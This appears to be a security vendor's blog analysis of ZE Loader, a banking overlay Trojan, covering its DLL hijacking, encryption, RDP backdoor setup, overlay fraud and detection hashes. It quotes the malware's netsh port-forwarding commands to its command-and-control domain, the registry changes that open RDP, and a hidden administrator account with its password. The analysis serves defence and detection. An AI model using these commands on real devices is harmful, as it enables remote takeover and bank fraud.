IBM Trusteer closely follows developments in the financial cyber crime arena. Recently, we discovered a new remote overlay malware that is more persistent and more sophisticated than most current-day codes. In this post we will dive into the technical details of the sample we worked on and present ZE Loader’s capabilities and features. The parts that differ from other malware of this kind are:
- Installation of a backdoor to the victim’s device
- Remaining stealthy in the guise of legitimate software
- Holding permanent assets on the victim’s device
- Stealing user credentials.
Another aspect we examine here is the malware’s algorithms used in the encryption of its resources and events. We will suggest some tactics to detect the presence of ZE Loader on infected devices to mitigate its potential impact.
Overlay Malware Is an Enduring Threat
Overlay malware is not a new threat, nor is it very sophisticated. Yet, this malware category, which typically spreads in Latin America, Spain and Portugal, is an enduring one. We keep seeing it used in attacks on online banking users in those regions, and its success fuels the interest of cyber criminals to continue using it.
In the case of ZE Loader, we did see some new features that push the typical boundaries of overlay Trojans. For example, most malware in this category does not keep assets on the infected device, but ZE Loader does. In most cases, this sort of malware does not go to the lengths of hiding its presence; its lifecycle is short and the effort is futile. ZE Loader does use some stealth tactics.
Typical Attack Anatomy
A remote overlay attack follows a rather familiar path. Once the user becomes infected — usually via malspam, phishing pages or malicious attachments — the malware is installed on the target device. In most cases, the malware begins monitoring browser window names for a targeted bank’s site. It then goes into action upon access to a hard-coded list of entities. With the regional focus of this malware type, it mostly goes after local banks.
Once the user lands on a targeted website, the attacker is notified in real-time. The attacker can then take over the device remotely using the remote access feature. As the victim accesses their online banking account, the attacker can see their activity and choose a time to interject. To trick users into divulging authentication codes or other personal data, attackers display full-screen overlay images that keep the victim from continuing the banking session. In the background, the attacker initiates a fraudulent money transfer from the compromised account and leverages the victim’s presence in real-time to obtain the required information to complete it.
It’s not an automated fraud scheme, but it is one that keeps working in certain parts of the world, which makes it a risk that banks must continue to reckon with.
Figure 1: Remote overlay Trojan: Typical kill chain (source: IBM Trusteer)
ZE Loader’s Execution and Post-Infection Behavior
ZE Loader hides as part of legitimate software by performing a dynamic link library (DLL) hijacking. Using a malicious DLL instead of the original one, it replaces a DLL named DVDSetting.dll.
In a recent campaign we analyzed, the attackers were using several payload options to infect the victim’s device. These payloads’ folders contained binary files from legitimate applications. Once executed, the seemingly benign applications would load the malware’s malicious DLL.
ZE Loader keeps its assets, such as fake images and files it runs, in a legitimate software’s folder as shown below.
Figure 2: ZE Loader’s malicious elements hidden inside a legitimate program’s folder
The malicious files being fetched from such folders are:
|File/ DLL name
||Contains all the images the malware uses in encrypted form.
||A Dephi DLL
||Decrypts and loads relevant components of the malware to run it.
||A Dephi DLL
||Responsible for installing and running remote desktop protocol (RDP) service on the infected device.
||A Delphi DLL
||Contains the main logic of the attack.
||Contains malware’s settings in encrypted form.
||Contains malware’s settings in encrypted form.
To evade any antivirus which might detect some of its resources, the ZE Loader changes its names or file extensions. For example:
IsName.name will change to c0V3l3A9R0P4b9w1c7q3W7M6u4A2d9Z5B9Q2F4T2A0T2h7U9M8T6p8M6r3H4_.exe
Figure 3: ZE Loader switches file names to evade antivirus detection
Optional payload paths we found when we analyzed this malware were:
- %programdata%\*\ PCHEALTH\*
When we looked at a machine we infected with ZE Loader, we saw additional file paths used:
- C:\Program Files\gMDwkHvX\rdpwrap.dll
- Avira folder: C:\Users\****\y0X7K4P8f5z5E2R1Y6t1B8y8l6Q1v9\
While we did see the malware’s operators hide it in the guise of more than one legitimate program, the JDK_SDK payload remained the same throughout the campaign.
ZE Loader’s Attack Anatomy
When we viewed the ZE Loader attack from an anatomy perspective, the elements interact as follows:
Figure 4: ZE Loader’s attack anatomy
Running the legitimate program used as ZE Loader’s front also loads the malicious DLL. In this case, it is DVDSetting.dll, and we can see in the image below that the legitimate software imports that DLL.
Figure 5: Malicious DLL being imported instead of the original, legitimate one
After the malicious DLL is loaded, the SetDecoderMode function in DVDSettings.dll reads the encrypted file procSettings and decrypts it.
This encrypted malicious file is a UPX-packed Delphi DLL that contains most of the logic of this overlay malware. Inside DVDSettings.dll there is also some embedded shellcode, also in encrypted form, which is responsible for unpacking and running the procSettings UPX-packed DLL post decryption.
Figure 6: DVDSettings.dll reads the encrypted file procSettings and decrypts it
In the image below we can see that the first call to the ‘decrypt’ function will decrypt the procSetting DLL file. The second call to the ‘decrypt’ function will result in decrypting the shellcode to unpack and run the procSetting DLL file.
Figure 7: First call to ‘decrypt’ function will decrypt the procSetting DLL file.
Next, the decrypted shellcode unpacks the decrypted procSettings DLL file and then calls the entry point of procSettings DLL.
The procSettings DLL
To find out more about what’s inside this core DLL, we performed a static examination of the DLL. This did not shed light on its functionality and rules that govern its activity. One of the things we did see is that this DLL is Borland Delphi compiled and that it imports different functions from different DLLs. This suggests that procSettings is the DLL that holds most of the logic of the malware and its implementation.
A dynamic analysis we ran allowed us to examine the exported function THetholdImplementationIntercept. We saw that first the malware created a mutex with the name CodeCall.Net Mutey in order to prevent multiple instances of the malware running at the same time.
Next, the malware ran a check to discern whether the targeted bank application was installed on the infected device. It did that by searching the software directory under %appdatalocal%.
If the software the attackers are interested in is indeed installed on the device, it further checks if the file C:\ProgramData\OkApp.is exists. This file is one of the malware’s files, used as an indicator; this file is empty of content.
Figure 8: ZE Loader’s indicator file that checks for previous infection
If ZE Loader’s scan identifies that this is the first time the malware has run on that device, it executes a series of steps as follows.
- First, ZE Loader checks that it is running with administrator privileges.
Figure 9: ZE Loader’s privilege check — “Is user admin?”
- ZE Loader executes a couple of Netshell commands in order to create a new connection for establishing an RDP connection to the command-and-control server (C&C).
- The first command it executes is ‘netsh interface portproxy reset’ in order to reset the proxy configuration settings.
- Next, it opens two proxy connections to eavesdrop on and have a connection to the C&C server:
netsh interface portproxy add v4tov4 listenport=1534 listenaddress=127.0.0.1 connectport=1534 connectaddress=controllefinaceiro2021.duckdns.org
netsh interface portproxy add v4tov4 listenport=27015 listenaddress=127.0.0.1 connectport=27015 connectaddress=controllefinaceiro2021.duckdns.org
- Next, ZE Loader loads the encrypted file ‘operationB’, decrypts and unpacks it. The encryption and unpacking methods are the same as before. This file is a malicious DLL that is responsible for setting an outbound RDP connection to the C&C.
Figure 10: ZE Loader opens an outbound RDP connection
We began with a static examination of the malicious DLL ‘OperationB.’ Examining the DLL’s resource section, we saw that it contained some legitimate RDP DLLs, including the right ones for each Windows architecture, as well as RDP configuration files.
Figure 11: RDP files used by ZE Loader
Figure 12: RDP configuration as used by ZE Loader
Dynamically running this malicious DLL, we see that it begins by saving the RDP DLL and its configuration on disk under a randomly generated directory; in this case, saved under %programFiles%.
Manipulating Security Settings
In the next step, ZE Loader manipulates some security settings to enable the attacker to have undisturbed remote access to the infected device.
ZE Loader searches for the service ‘TermService’. This service allows RDP connections to stream to and from the client device. ZE Loader sets its configuration settings to SERVICE_AUTO_START with the path of the RDP DLL file it already saved on disk.
Next, ZE Loader changes the settings of the infected device to allow and establish multiple RDP connections to and from that device. The following settings are toggled to ‘true’:
- HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnection
- HKLM\System\CurrentControlSet\Control\Terminal Server\Licensing Core\EnableConCurrentSessions
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipuleTSSession
Figure 13: RDP configuration allows connections to and from the infected device
Additional RDP settings are configured to enable the attacker to eventually use the remote access to the infected device without much effort.
Figure 14: RDP configuration bypasses security on the infected device
The malware adds a new user account to the victim’s local area network settings with the name Administart0r and password 123mudar. To ensure it is allowed to perform admin actions on the device, the malware adds the new malicious user to the localgroup ‘administradores’.
Figure 15: ZE Loader adds a user to the administrator’s local group
In the last step of the malware, before an attack is performed, ZE Loader further sets a new rule in the firewall that allows anyone to use RDP connections.
Figure 16: ZE Loader creates firewall rule to allow RDP connections for all
Going Into Action Mode
Once it is resident on the infected device and all the preparations are in place, ZE Loader begins monitoring the victim’s activity on the web browser, waiting for them to authenticate an online banking session or access a designated banking application on the desktop. To do that, it monitors running processes and will kill the corresponding process if one is started:
Figure 17: ZE Loader kills the process of designated banking apps if any are opened
After killing the app processes, it loads an encrypted string fetched from the file ‘Host.hst.’ This file contains the encrypted domain name: ‘controlefinaceiro2021.duckdns.org.’
To trick the victim into believing the app did open, the malware sets up a new window to pop up with app images. It loads and decrypts an image that corresponds to the targeted bank brand from the encrypted images directory: /JDK_SDK.
Figure 18: ZE Loader loading fake images from its locally stored trove
As part of the attack, the malware presents different pages/images that mimic bank applications in order to trick the victim into entering their credentials into data fields in the image. The attacker uses those to either take the session over on web browsers or access the application remotely through the victim’s device using an RDP connection.
ZE Loader’s Cryptography
ZE Loader uses a couple of cryptographic algorithms as part of its execution and to hide assets and files. The following are the main findings from our analysis:
Decrypt(data, IV_array, IV_size, size)
This function is responsible for decrypting the different assets of the malware, including DLL files, embedded shellcode, images, etc.
The function’s available parameters are:
- Data: the encrypted data to be decrypted
- IV_array: array of values needed for the decryption process
- IV_size: length of the IV array
- Size: size of the encrypted data.
Figure 19: ZE Loader’s decryption function parameters
Command_or_decrypt(command, encrypted_str, result)
This function is responsible for the decryption of strings embedded in the sample. The available parameters of the function are:
- Command: there are two types of commands for this function — C & D
- Encrypted str: the encrypted string
- Result: array that will contain the decrypted string.
Figure 20: ZE Loader’s string decryption function parameters
Decrypt_image(image_path, decrypted_image, key)
This function is responsible for decrypting images that the malware keeps locally, hidden in the directory JDK_SDK. The decryption algorithm the malware uses is the BlowFish encryption algorithm with the hard-coded key ‘1’. Blowfish is a symmetric-key block cipher that provides a good encryption rate in software and was likely used for that reason. The parameters of the function are:
- Image_path: path of the encrypted image
- Decrypted_image: the decrypted image after the decryption process
- Key: key for the decryption algorithm; the key is the hard-coded char ‘1’.
Figure 21: ZE Loader’s image decryption function and its parameters
Piecing It Together
The malware keeps encrypted images that mimic its various targets’ websites and designated applications locally in the ‘JDK_SDK’ directory. After decrypting that directory, we were able to access a wide range of targets. On top of popular banks, the malware targets some blockchain platforms and cryptocurrency exchange platforms.
The images also led to insights regarding some of the sophisticated ways the attacker overcomes two-factor authentication challenges in order to steal user credentials. For example, one of the malware’s assets named ‘coin.tlb’ is a file that contains two encrypted strings. After decrypting the strings, we found the two strings below:
ZE 19/01/2021 — malware version was extracted from the malware configuration settings.
Remote Overlay Trojans Still Going Strong
While it is a dated threat, remote overlay Trojans are an enduring staple in the cyber crime arena. Prolific in Latin America, they also target European countries where the same languages are spoken, so as to maximize the reach of their attacks. The strength of attacks that leverage this malware type is the remote access to user devices. Adding manual work in real time allows attackers to extract critical transaction elements from their victims and finalize transactions that are otherwise adequately protected.
While it lacks sophistication on the code level, its overall scheme continues to work. To mitigate the risk of remote overlay Trojans, here are some things users can do:
- Do not open unsolicited emails and don’t click links or attachments inside such messages
- Do not log in to bank accounts from an email that appears to urge action
- When in doubt, call your bank
- Have an antivirus installed on your device and turn on automatic updates
- Keep your operating system and all programs up to date
- Delete applications that are not in use
- Disable remote connections to your device. Press Windows + X à click ‘System’. From the left sidebar click ‘Remote Desktop’ and make sure the remote desktop option is toggled off.
To keep up to date about IBM Trusteer blogs, visit https://securityintelligence.com/category/x-force and find content that can help you better manage the risk of malware and online fraud in your personal and business activities.
5bf9e6e94461ac63a5d4ce239d913f69 – DVDSetting.dll
8803df5c4087add10f829b069353f5b7 – operationB
520170d2edfd2bd5c3cf26e48e8c9c71 – procSettings
39aa9dadd3fc2842f0f2fdcea80a94c7 – Host.hst
25e60452fa27f01dc81c582a1cbec83f – IsCon.tlb
4280f455cf4d4e855234fac79d5ffda0 – JDK_SDK.zip